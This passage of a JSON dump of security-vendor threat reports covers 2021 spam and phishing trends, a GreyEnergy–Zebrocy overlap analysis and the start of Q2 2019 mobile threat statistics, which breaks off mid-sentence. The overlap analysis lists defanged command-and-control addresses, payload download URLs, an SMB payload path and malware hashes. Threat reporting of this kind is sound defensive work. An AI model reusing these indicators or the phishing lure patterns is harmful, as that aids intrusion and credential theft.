resource.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094341/Spam_report_2021_08.png>)\n\nAnother noticeable phishing trend targeting the corporate sector was to exploit popular cloud services as bait. Fake notifications about meetings in Microsoft Teams or a message about important documents sent via SharePoint for salary payment approval aimed to lower the recipient's guard and prompt them to enter the username and password for their corporate account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094433/Spam_report_2021_09.png>)\n\n### COVID-19\n\n#### Scams\n\nThe subject of COVID-19 which dominated newsfeeds throughout the entire year was exploited by scammers in various schemes. In particular, attackers continued sending out messages about compensation and subsidies related to restrictions imposed to combat the pandemic, as this issue remained top of the agenda. The e-mails contained references to laws, specific measures imposed and the names of governmental organizations to make them sound more convincing. To receive the money, the recipient supposedly just needed to pay a small commission fee to cover the cost of the transfer. In reality, the scammers disappeared after receiving their requested commission along with the victim's bank card details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094510/Spam_report_2021_10.png>)\n\nThe sale of fake COVID vaccination passes and QR codes became another source of income for cybercriminals. The fraudsters emphasized how quickly they could produce forged documents and personalized QR codes. These transactions are dangerous in that, on the one hand, the consequences can be criminal charges in some countries, and on the other hand, scammers can easily trick the customer. There's no guarantee that the code they're selling will work. Another risk is that the buyer needs to reveal sensitive personal information to the dealer peddling the certs in order to make the transaction.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094550/Spam_report_2021_11.png>)\n\n#### The corporate sector\n\nCOVID-19 remained a relevant topic in phishing e-mails targeting the business sector. One of the main objectives in these mailing operations was to convince recipients to click a link leading to a fake login page and enter the username and password for their corporate account. Phishers used various ploys related to COVID-19. In particular, we detected notifications about compensation allocated by the government to employees of certain companies. All they needed to do in order to avail of this promised support was to "confirm" their e-mail address by logging in to their account on the scam website.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094621/Spam_report_2021_12.png>)\n\nAnother malicious mailshot utilized e-mails with an attached HTML file called "Covid Test Result". Recipients who tried to open the file were taken to a scam website where they were prompted to enter the username and password for their Microsoft account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094648/Spam_report_2021_13.png>)\n\nThe "important message about vaccination" which supposedly lay unread in a recipient's inbox also contained a link to a page belonging to attackers requesting corporate account details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094709/Spam_report_2021_14.png>)\n\nAnother type of attack deployed e-mails with malicious attachments. Shocking news, such as immediate dismissal from work accompanied by the need to take urgent action and read a "2 months salary receipt" were intended to make the recipient open the attachment with the malicious object as quickly as possible.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094735/Spam_report_2021_15.png>)\n\n#### COVID-19 vaccination\n\nWhile authorities in various countries gradually rolled out vaccination programs for their citizens, cybercriminals exploited people's desire to protect themselves from the virus by getting vaccinated as soon as possible. For instance, some UK residents received an e-mail claiming to be from the country's National Health Service. In it, the recipient was invited to be vaccinated, having first confirmed their participation in the program by clicking on the link. In another mailing, scammers emphasized that only people over the age of 65 had the opportunity to get vaccinated.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094800/Spam_report_2021_16.png>)\n\nIn both cases, a form had to be filled out with personal data to make a vaccination appointment; and in the former case, the phishers also asked for bank card details. If the victim followed all the instructions on the fake website, they handed their account and personal data over to the attackers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094834/Spam_report_2021_17.png>)\n\nAnother way to gain access to users' personal data and purse strings was through fake vaccination surveys. Scammers sent out e-mails in the name of large pharmaceutical companies producing COVID-19 vaccines, or posing as certain individuals. The e-mail invited recipients to take part in a small study.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094909/Spam_report_2021_18.png>)\n\nThe scammers promised gifts or even monetary rewards to those who filled out the survey. After answering the questions, the victim would be taken to a "prize" page but told to pay a small necessary "commission fee" in order to receive it. The scammers received the money, but the victim got nothing as a result.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094931/Spam_report_2021_19.png>)\n\nWe also observed a mailing last year which exploited the subject of vaccination to spread malware. The subject lines of these e-mails were randomly selected from various sources. The attached document contained a macro for running a PowerShell script detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>). SAgent malware is used at the initial stage of an attack to deliver other malware to the victim's system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094958/Spam_report_2021_20.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nOn average, 45.56% of global mail traffic was spam in 2021. The figure fluctuated over the course of the year.\n\n_Share of spam in global e-mail traffic, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101352/01-en-spam-report-2021.png>))_\n\nWe observed the largest percentage of spam in the second quarter (46.56%), which peaked in June (48.03%). The fourth quarter was the quietest period (44.54%), with only 43.70% of e-mails detected as spam in November.\n\n### Source of spam by country or region\n\nLike in 2020, the most spam in 2021 came from Russia (24.77%), whose share rose by 3.5 p.p. Germany, whose share rose 3.15 p.p. to 14.12%, remained in second place. They were followed by the United States (10.46%) and China (8.73%), who've also stayed put in third and fourth place. The share of spam sent from the United States barely moved, while China's rose 2.52 p.p. compared to 2020.\n\n_Sources of spam by country or region in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101419/03-en-spam-report-2021.png>))_\n\nThe Netherlands (4.75%) moved up to fifth place, with its share rising by just 0.75 p.p. to overtake France (3.57%), whose share went in the opposite direction. Spain (3.00%) and Brazil (2.41%) also swapped places, and the top ten was rounded out by the same two countries as 2020, Japan (2,36%) and Poland (1.66%). In total, over three quarters of the world's spam was sent from these ten countries.\n\n### Malicious mail attachments\n\n_Dynamics of Mail Anti-Virus triggerings in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101444/04-en-spam-report-2021.png>))_\n\nIn 2021, the Kaspersky Mail Anti-Virus blocked 148 173 261 malicious e-mail attachments. May was the quietest month, when just over 10 million attachments were detected, i.e., 7.02% of the annual total. In contrast, October turned out to be the busiest month, when we recorded over 15 million attacks blocked by the Mail Anti-Virus, i.e., 10.24% of the annual total.\n\n#### Malware families\n\nThe attachments most frequently encountered and blocked by the antivirus in 2021 were Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family, which steal login credentials stored in browsers as well as credentials from e-mail and FTP clients. Members of this family were found in 8.67% of the malicious files detected, which is 0.97 p.p. up on 2020. Second place was taken by [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (6.31%), distributed in archives and disguised as electronic documents. In another 3.95% of cases, our products blocked attacks exploiting the [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) vulnerability in Microsoft Equation Editor, which remains significant for the fourth year in a row. Almost the same amount of attachments belonged to the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (3.93%) family, which create malicious tasks in Windows Task Scheduler.\n\n_TOP 10 malware families spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101509/05-en-spam-report-2021.png>))_\n\nThe fifth and tenth most popular forms of malware sent in attachments were Noon spyware Trojans for [any version](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) of Windows OS (3.63%) and [32-bit versions](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.90%), respectively. Malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images accounted for 3.21% of all attachments blocked, while SAgent Trojans contributed 2.53%. Eighth place was taken by another exploited vulnerability in Equation Editor called [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (2.38%), while in the ninth place were [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%), which are mainly used to deliver different types of malware to an infected system.\n\n_TOP 10 types of malware spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101548/06-en-spam-report-2021.png>))_\n\nThe ten most common verdicts in 2021 coincided with the TOP 10 families. This means attackers mainly spread one member of each family.\n\n#### Countries and regions targeted by malicious mailings\n\nIn 2021, the Mail Anti-Virus most frequently blocked attacks on devices used in Spain (9.32%), whose share has risen for the second year in a row. Russia rose to second place (6.33%). The third largest number of malicious files were blocked in Italy (5.78%).\n\n_Countries and regions targeted by malicious mailshots in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101614/07-en-spam-report-2021.png>))_\n\nGermany (4.83%) had been the most popular target in phishing attacks for several years until 2020. It dropped to fifth place in 2021, giving way to Brazil (4.84%) whose share was just 0.01 p.p higher than Germany's. They're followed in close succession by Mexico (4.53%), Vietnam (4.50%) and the United Arab Emirates (4.30%), with the same countries recorded in 2020 rounding out the TOP 10 targets: Turkey (3.37%) and Malaysia (2.62%).\n\n## Statistics: phishing\n\nIn 2021, our Anti-Phishing system blocked 253 365 212 phishing links. In total, 8.20% of Kaspersky users in different countries and regions around the world have faced at least one phishing attack.\n\n### Map of phishing attacks\n\n_Geography of phishing attacks in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101643/08-en-spam-report-2021.png>))_\n\nUsers living in Brazil made the most attempts to follow phishing links, with the Anti-Phishing protection triggered on devices belonging to 12.39% of users in this country. Brazil was also the top phishing target in 2020. France rose to second place (12.21%), while Portugal (11.40%) remained third. It's worth noting that phishing activity was so rampant in France last year that the country topped the leaderboard of targeted users in the first quarter.\n\nMongolia (10.98%) found itself in forth place for the number of users attacked in 2021, making it onto this list for the first time. The countries which followed in close succession were R\u00e9union (10.97%), Brunei (10.89%), Madagascar (10.87%), Andorra (10.79%), Australia (10.74%), and Ecuador (10.73%).\n\nTOP 10 countries by share of users targeted in phishing attacks:\n\n**Country** | **Share of attacked users*** \n---|--- \nBrazil | 12.39% \nFrance | 12.21% \nPortugal | 11.40% \nMongolia | 10.98% \nR\u00e9union | 10.97% \nBrunei | 10.89% \nMadagascar | 10.87% \nAndorra | 10.79% \nAustralia | 10.74% \nEcuador | 10.73% \n \n_* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2021_\n\n### Top-level domains\n\nMost of the phishing websites blocked in 2021 used a .com domain name like in 2020, whose share rose 7.19 p.p., reaching 31.55%. The second most popular domain name used by attackers was .xyz (13.71%), as those domains are cheap or even free to register. The third row on the list was occupied by the Chinese country-code domain .cn (7.14%). The Russian domain .ru (2.99%) fell to sixth place, although its share has grown since 2020. It now trails behind the domains .org (3.13%) and .top (3.08%), and is followed by the domain names .net (2.20%), .site (1.82%), and .online (1.56%). The list is rounded out by the low-cost .tk domain (1.17%) belonging to the island nation of Tokelau, which attackers are attracted to for the same reason they're attracted to .xyz.\n\n_Most frequent top-level domains for phishing pages in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101710/09-en-spam-report-2021.png>))_\n\n### Organizations mimicked in phishing attacks\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nThe demand for online shopping remained high in 2021, which is reflected in phishing trends: phishing pages were most frequently designed to mimic online stores (17.61%). These were closely followed by global Internet portals (17.27%) in second place. Payment systems (13.11%) climbed to third place, rising 4.7 p.p. to overtake banks (11.11%) and social networks (6.34%). Instant messengers (4.36%) and telecom companies (2.09%) stayed in sixth and seventh place, respectively, although their shares both fell. IT companies (2.00%) and financial services (1.90%) also held onto their places in the rating. The TOP 10 was rounded out by online games (1.51%), as attackers went after gamers more frequently than after users of delivery services in 2021.\n\n_Distribution of organizations most often mimicked by phishers, by category, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101743/10-en-spam-report-2021.png>))_\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn 2021, Safe Messaging blocked 341 954 attempts to follow phishing links in various messengers. Most of these were links that users tried to follow from WhatsApp (90.00%). Second place was occupied by Telegram (5.04%), with Viber (4.94%) not far behind.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101811/11-en-spam-report-2021.png>))_\n\nOn average, WhatsApp users attempted to follow phishing links 850 times a day. We observed the least phishing activity at the beginning of the year, while in December the weekly number of blocked links exceeded the 10 000 mark. We have observed a spike in phishing activity on WhatsApp in July, when the Trojan.AndroidOS.Whatreg.b, which is mainly used to register new WhatsApp accounts, also became more active. We can't say for sure that there's a connection between Whatreg activity and phishing in this messaging app, but it's a possibility. We also observed another brief surge in phishing activity on the week from October 31 through to November 6, 2021.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100059/Spam_report_2021_21.png>)\n\n**_Dynamics of phishing activity on WhatsApp in 2021 (weekly number of detected links shown)_**\n\nOn average, the Safe Messaging component detected 45 daily attempts to follow phishing links sent via Telegram. Similar to WhatsApp, phishing activity increased towards the end of the year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100143/Spam_report_2021_22.png>)\n\n**_Dynamics of phishing activity on Telegram in 2021 (weekly number of detected links shown)_**\n\nA daily average of 45 links were also detected on Viber, although phishing activity on this messenger dropped off towards the end of the year. However, we observed a peak in August 2021.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100213/Spam_report_2021_23.png>)\n\n**_Dynamics of phishing activity on Viber in 2021 (weekly number of detected links shown)_**\n\n## Conclusion\n\nAs we had expected, the key trends from 2020 continued into 2021. Attackers actively exploited the subject of COVID-19 in spam e-mails, which remained just as relevant as it was a year earlier. Moreover, baits related to vaccines and QR codes \u2014 remaining two of the year's main themes \u2014 were added to the bag of pandemic-related tricks. As expected, we continued to observe a variety of schemes devised to hack corporate accounts. In order to achieve their aims, attackers forged e-mails mimicking notifications from various online collaboration tools, sent out notifications about non-existent documents and similar business-related baits. There were also some new trends, such as the investment scam which is gaining momentum.\n\nThe key trends in phishing attacks and scams are likely to continue into the coming year. Fresh "investment projects" will replace their forerunners. "Prize draws" will alternate with holiday giveaways when there's a special occasion to celebrate. Attacks on the corporate sector aren't going anywhere either. Given remote and hybrid working arrangements are here to stay, the demand for corporate accounts on various platforms is unlikely to wane. The topic of COVID-19 vaccination status will also remain relevant. Due to the intensity of the measures being imposed in different countries to stop the spread of the virus, we'll more than likely see a surge in the number of forged documents up for sale on the dark web, offering unrestricted access to public places and allowing holders to enjoy all the freedoms of civilization.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-09T10:00:28", "type": "securelist", "title": "Spam and phishing in 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2022-02-09T10:00:28", "id": "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "href": "https://securelist.com/spam-and-phishing-in-2021/105713/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-01-24T16:53:08", "description": "\n\nIn October 2018, ESET published a[ report](<https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf>) describing a set of activity they called GreyEnergy, which is believed to be a successor to BlackEnergy group. BlackEnergy (a.k.a. Sandworm) is best known, among other things, for having been involved in attacks against Ukrainian energy facilities in 2015, which led to power outages. Like its predecessor, GreyEnergy malware has been detected attacking industrial and ICS targets, mainly in Ukraine.\n\n[Kaspersky Lab ICS CERT](<https://ics-cert.kaspersky.com/>) has identified an overlap between GreyEnergy and a Sofacy subset called [\"Zebrocy\"](<https://securelist.com/a-slice-of-2017-sofacy-activity/83930/>). The Zebrocy activity was named after malware that Sofacy group began to use since mid-November 2015 for the post-exploitation stage of attacks on its victims. Zebrocy's targets are widely spread across the Middle East, Europe and Asia and the targets' profiles are mostly government-related.\n\nBoth sets of activity used the same servers at the same time and targeted the same organization.\n\n## **Details**\n\n### **Servers**\n\nIn our private APT Intel report from July 2018 \"Zebrocy implements new VBA anti-sandboxing tricks\", details were provided about different Zebrocy C2 servers, including **193.23.181[.]151**.\n\nIn the course of our research, the following Zebrocy samples were found to use the same server to download additional components (MD5):\n\n7f20f7fbce9deee893dbce1a1b62827d \n170d2721b91482e5cabf3d2fec091151 \neae0b8997c82ebd93e999d4ce14dedf5 \na5cbf5a131e84cd2c0a11fca5ddaa50a \nc9e1b0628ac62e5cb01bf1fa30ac8317\n\nThe URL used to download additional data looks as follows:\n\nhxxp://**193.23.181**[.]151/help-desk/remote-assistant-service/PostId.php?q={hex}\n\nThis same C2 server was also used in a spearphishing email attachment sent by GreyEnergy (aka FELIXROOT), as mentioned in a [FireEye report](<https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html>). Details on this attachment are as follows:\n\n * The file (11227eca89cc053fb189fac3ebf27497) with the name \"Seminar.rtf\" exploited CVE-2017-0199\n * \"Seminar.rtf\" downloaded a second stage document from: hxxp://**193.23.181[.]151**/Seminar.rtf (4de5adb865b5198b4f2593ad436fceff, exploiting CVE-2017-11882)\n * The original document (Seminar.rtf) was hosted on the same server and downloaded by victims from: hxxp://**193.23.181[.]151**/ministerstvo-energetiki/seminars/2019/06/Seminar.rtf\n\nAnother server we detected that was used both by Zebrocy and by GreyEnergy is **185.217.0[.]124**. Similarly, we detected a spearphishing GreyEnergy document (a541295eca38eaa4fde122468d633083, exploiting CVE-2017-11882), also named \"Seminar.rtf\".\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125754/190123-GreyEnergy_overlap-1.png>)\n\n_\"Seminar.rtf\", a GreyEnergy decoy document_\n\nThis document downloads a GreyEnergy sample (78734cd268e5c9ab4184e1bbe21a6eb9) from the following SMB link:\n\n\\\\\\**185.217.0[.]124**\\Doc\\Seminar\\Seminar_2018_1.AO-A\n\nThe following Zebrocy samples use this server as C2:\n\n7f20f7fbce9deee893dbce1a1b62827d \n170d2721b91482e5cabf3d2fec091151 \n3803af6700ff4f712cd698cee262d4ac \ne3100228f90692a19f88d9acb620960d\n\nThey retrieve additional data from the following URL:\n\nhxxp://**185.217.0[.]124**/help-desk/remote-assistant-service/PostId.php?q={hex}\n\nIt is worth noting that at least two samples from the above list use both **193.23.181[.]151** and **185.217.0[.]124** as C2s.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125807/190123-GreyEnergy_overlap-2.png>)\n\n_Hosts associated with GreyEnergy and Zebrocy_\n\n### **Attacked company**\n\nAdditionally, both GreyEnergy and Zebrocy spearphishing documents targeted a number of industrial companies in Kazakhstan. One of them was attacked in June 2018.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/24083359/190124-GreyEnergy_overlap-3.png>)\n\n_GreyEnergy and Zebrocy overlap_\n\n### **Attack timeframe**\n\nA spearphishing document entitled 'Seminar.rtf', which retrieved a GreyEnergy sample, was sent to the company approximately on June 21, 2018, followed by a Zebrocy spearphishing document sent approximately on June 28:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125842/190123-GreyEnergy_overlap-4.png>)\n\n_'(28.06.18) Izmeneniya v prikaz PK.doc' Zebrocy decoy document translation: _ \n_'Changes to order, Republic of Kazakhstan'_\n\nThe two C2 servers discussed above were actively used by Zebrocy and GreyEnergy almost at the same time:\n\n * 193.23.181[.]151 was used by GreyEnergy and Zebrocy in June 2018\n * 185.217.0[.]124 was used by GreyEnergy between May and June 2018 and by Zebrocy in June 2018\n\n## **Conclusions **\n\nThe GreyEnergy/BlackEnergy actor is an advanced group that possesses extensive knowledge on penetrating into their victim\u00b4s networks and exploiting any vulnerabilities it finds. This actor has demonstrated its ability to update its tools and infrastructure in order to avoid detection, tracking, and attribution.\n\nThough no direct evidence exists on the origins of GreyEnergy, the links between a Sofacy subset known as Zebrocy and GreyEnergy suggest that these groups are related, as has been suggested before by some public analysis. In this paper, we detailed how both groups shared the same C2 server infrastructure during a certain period of time and how they both targeted the same organization almost at the same time, which seems to confirm the relationship's existence.\n\nFor more information about APT reports please contact: intelreports@kaspersky.com \n\nFor more information about ICS threats please contact: [ics-cert@kaspersky.com](<mailto:cs-cert@kaspersky.com>)", "cvss3": {}, "published": "2019-01-24T09:00:47", "type": "securelist", "title": "GreyEnergy\u2019s overlap with Zebrocy", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882"], "modified": "2019-01-24T09:00:47", "id": "SECURELIST:3DB11A5605F77743FA5F931DF816A83C", "href": "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-08-19T18:27:50", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network,\n\n * Kaspersky solutions blocked 717,057,912 attacks launched from online resources in 203 countries across the globe.\n * 217,843,293 unique URLs triggered Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 228,206 users.\n * Ransomware attacks were defeated on the computers of 232,292 unique users.\n * Our File Anti-Virus detected 240,754,063 unique malicious and potentially unwanted objects.\n * Kaspersky products for mobile devices detected: \n * 753,550 malicious installation packages\n * 13,899 installation packages for mobile banking Trojans\n * 23,294 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Quarterly highlights\n\nQ2 2019 will be remembered for several events.\n\nFirst, we uncovered a large-scale [financial threat by the name of Riltok](<https://securelist.com/mobile-banker-riltok/91374/>), which targeted clients of not only major Russian banks, but some foreign ones too.\n\nSecond, we detected the new Trojan.AndroidOS.MobOk malware, tasked with stealing money from mobile accounts through exploiting WAP-Click subscriptions. After infection, web activity on the victim device went into overdrive. In particular, the Trojan opened specially created pages, bypassed their CAPTCHA system using a third-party service, and then clicked on the necessary buttons to complete the subscription.\n\nThird, we repeated our [study](<https://securelist.com/beware-of-stalkerware/90264/>) of commercial spyware, a.k.a. stalkerware. And although such software is not malicious in the common sense of the word, it does entail certain risks for victims. So as of April 3, 2019, Kaspersky mobile products for Android notify users of all known commercial spyware.\n\nFourth, we managed to discover a new type of adware app (AdWare.AndroidOS.KeepMusic.a and AdWare.AndroidOS.KeepMusic.b verdicts) that bypasses operating system restrictions on apps running in the background. To stop its thread being terminated, one such adware app launches a music player and plays a silent file. The operating system thinks that the user is listening to music, and does not end the process, which is not displayed on the main screen of the device. At this moment, the device is operating as part of a botnet, supposedly showing ads to the victim. \"Supposedly\" because ads are also shown in background mode, when the victim might not be using the device.\n\nFifth, our attention was caught by the Hideapp family of Trojans. These Trojans spread very actively in Q2, including by means of a time-tested distribution mechanism: antivirus solution logos and porn apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153149/it-threat-evolution-q2-2019-statistics-1.png>)\n\nFinally, in some versions, the Trojan creators revealed a less-than-positive attitude to managers of one of Russia's largest IT companies:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153203/it-threat-evolution-q2-2019-statistics-2.png>)\n\n### Mobile threat statistics\n\nIn Q2 2019, Kaspersky detected 753,550 malicious installation packages, which is 151,624 fewer than in the previous quarter.\n\n_Number of detected malicious installation packages, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153226/it-threat-evolution-q2-2019-statistics-3.png>)\n\nWhat's more, this is almost 1 million fewer than the number of malicious installation packages detected in Q2 2018. Over the course of this year, we have seen a steady decline in the amount of new mobile malware. The drop is the result of less cybercriminal activity in adding members to the most common families. \n\n### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile apps by type, Q1 and Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153256/it-threat-evolution-q2-2019-statistics-4.png>)\n\nAmong all the threats detected in Q2 2019, the lion's share went to potentially unsolicited RiskTool apps with 41.24%, which is 11 p.p. more than in the previous quarter. The malicious objects most frequently encountered came from the RiskTool.AndroidOS.Agent family (33.07% of all detected threats in this class), RiskTool.AndroidOS.Smssend (15.68%), and RiskTool.AndroidOS.Wapron (14.41%).\n\nIn second place are adware apps, their share having increased by 2.16 p.p. to 18.71% of all detected threats. Most often, adware belonged to the AdWare.AndroidOS.Ewind family (26.46% of all threats in this class), AdWare.AndroidOS.Agent (23.60%), and AdWare.AndroidOS.MobiDash (17.39%).\n\nTrojan-class malware (11.83%) took third place, with its share for the quarter climbing by 2.31 p.p. The majority of detected files belonged to the Trojan.AndroidOS.Boogr family (32.42%) \u2013 this verdict was given to Trojans detected with machine-learning tools. Next come the Trojan.AndroidOS.Hiddapp (24.18%), Trojan.AndroidOS.Agent (14.58%), and Trojan.AndroidOS.Piom (9.73%) families. Note that Agent and Piom are aggregating verdicts that cover a range of Trojan specimens from various developers.\n\nThreats in the Trojan-Dropper class (10.04%) declined noticeably, shedding 15 p.p. Most of the files we detected belonged to the Trojan-Dropper.AndroidOS.Wapnor family (71% of all detected threats in this class), while no other family claimed more than 3%. A typical member of the Wapnor family consists of a random pornographic image, a polymorphic dropper, and a unique executable file. The task of the malware is to sign the victim up to a WAP subscription.\n\nIn Q2 2019, the share of detected mobile bankers slightly decreased: 1.84% versus 3.21% in Q1. The drop is largely due to a decrease in the generation of Trojans in the [Asacub](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>) family. The most frequently created objects belonged to the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/the-android-trojan-svpeng-now-capable-of-mobile-phishing/57301/>) (30.79% of all detected mobile bankers), Trojan-Banker.AndroidOS.Wroba (17.16%), and Trojan-Banker.AndroidOS.Agent (15.70%) families.\n\n### Top 20 mobile malware programs\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs related to RiskTool or adware._\n\n| Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 44.37 \n2 | Trojan.AndroidOS.Boogr.gsh | 11.31 \n3 | DangerousObject.AndroidOS.GenericML | 5.66 \n4 | Trojan.AndroidOS.Hiddapp.cr | 4.77 \n5 | Trojan.AndroidOS.Hiddapp.ch | 4.17 \n6 | Trojan.AndroidOS.Hiddapp.cf | 2.81 \n7 | Trojan.AndroidOS.Hiddad.em | 2.53 \n8 | Trojan-Dropper.AndroidOS.Lezok.p | 2.16 \n9 | Trojan-Dropper.AndroidOS.Hqwar.bb | 2.08 \n10 | Trojan-Banker.AndroidOS.Asacub.a | 1.93 \n11 | Trojan-Banker.AndroidOS.Asacub.snt | 1.92 \n12 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.91 \n13 | Trojan.AndroidOS.Hiddapp.cg | 1.89 \n14 | Trojan.AndroidOS.Dvmap.a | 1.88 \n15 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.86 \n16 | Trojan.AndroidOS.Agent.rt | 1.81 \n17 | Trojan-SMS.AndroidOS.Prizmes.a | 1.58 \n18 | Trojan.AndroidOS.Fakeapp.bt | 1.58 \n19 | Trojan.AndroidOS.Agent.eb | 1.49 \n20 | Exploit.AndroidOS.Lotoor.be | 1.46 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked._\n\nAs per tradition, first place in our Top 20 for Q2 went to the DangerousObject.Multi.Generic verdict (44.77%), which we use for malware detected using [cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. This is basically how the latest malicious programs are detected.\n\nSecond and third places were claimed by Trojan.AndroidOS.Boogr.gsh (11.31%) and DangerousObject.AndroidOS.GenericML (5.66%). These verdicts are assigned to files recognized as malicious by our [machine-learning systems](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nFourth, fifth, sixth, seventh, and 